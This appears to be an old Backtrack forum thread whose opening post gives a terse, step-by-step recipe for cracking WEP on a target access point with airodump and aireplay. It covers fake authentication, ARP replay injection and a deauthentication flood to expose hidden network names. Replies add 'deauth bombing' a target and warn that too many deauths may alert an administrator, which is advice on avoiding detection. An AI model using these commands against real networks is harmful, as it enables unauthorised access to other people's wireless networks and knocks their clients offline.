Results 1 to 6 of 6

Thread: An even quicker way of cracking WEP with B|T

  1. #1
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    3

    Default An even quicker way of cracking WEP with B|T

    This is a guide for all those REALLY lazy people out there, who come into #remote-exploit complaining that they dont understand the guides on here.
    Granted, you people should be directed to www.google.com, or shot... which ever works best.

    However! If this will save me some time explaining later... im all for it.

    FIRST NOTE:
    My laptop which I use backtrack on is poop. So I try not to run X whenever possible, so for this guide, lets just assume that you're running it CLI style
    For this tutorial I am using a Proxim Orinoco Gold card (8470-WD)
    This device runs on ath0.


    SECOND NOTE:
    someone buy me a nice laptop!


    ###############################
    login to system
    airodump ath0 outfile 0 1

    ALT F2

    login to system
    aireplay ath0 -1 0 -e TARGETESSID -a TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5
    aireplay ath0 -3 -e TARGETESSID -b TARGETBSSID -h CLIENTMAC/0:1:2:3:4:5 -x 985

    If youre close enough to the AP, the AP isnt heavily protected against packet injection, AND youve got a rough idea what youre doing, you should see the IV's flying up in ALT F1 (airodump).
    If not, unlucky, wont work this time. May I suggest you read up on what youre doing and find a better way of doing it.

    SIDE NOTE: If the AP youre targetting does not broadcast its ESSID, run:
    aireplay ath0 -0 135 -a BSSID -h CLIENTMAC/0:1:2:3:4:5

    this should deauth clients, forcing them to reconnect, and theres a chance you'll pick up the ESSID during this process.

    Goodluck!

  2. #2
    Junior Member
    Join Date
    Feb 2006
    Posts
    72

    Default

    Gives flame a Gold Star thanks for keeping it easy for the lazy people.
    \|,,,,,,,,,,,\|/,,,,,,,,,,,,|/
    -(o)===(<(O)>)===(o)-
    /|''''''''''''''''`/|\'''''''''''''''''''|\

  3. #3
    Junior Member
    Join Date
    Feb 2006
    Posts
    38

    Default

    As far as I know, Kismet will find the SSID of APs. Mine doesnt broadcast, but given about 30 seconds, Kismet identifies my ID.

  4. #4
    Just burned his ISO
    Join Date
    Mar 2006
    Posts
    3

    Default

    k, well kismet can do it sometimes, but ive found the best way of getting a hidden essid is to deauth bomb the target :S but use whatever works best for you

  5. #5
    Junior Member
    Join Date
    Feb 2006
    Posts
    72

    Default

    If you issue too many DeAuths in secure airspace you may alert an Admin to your presence. Beware!
    \|,,,,,,,,,,,\|/,,,,,,,,,,,,|/
    -(o)===(<(O)>)===(o)-
    /|''''''''''''''''`/|\'''''''''''''''''''|\

  6. #6
    Junior Member
    Join Date
    Feb 2006
    Posts
    38

    Default

    Doesnt suprise me, but could you tell me what signs I'd expect to see? I've deauth my computer many times. I'd run the command, and if when it completes I dont get ARP packets, I'd issue it again. Sometimes doing it 5 or more times with 10 deauths. Never did I loose connectivity on MSN or have Windows warn me I lost connection.

    Im assuming its all in router logs?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •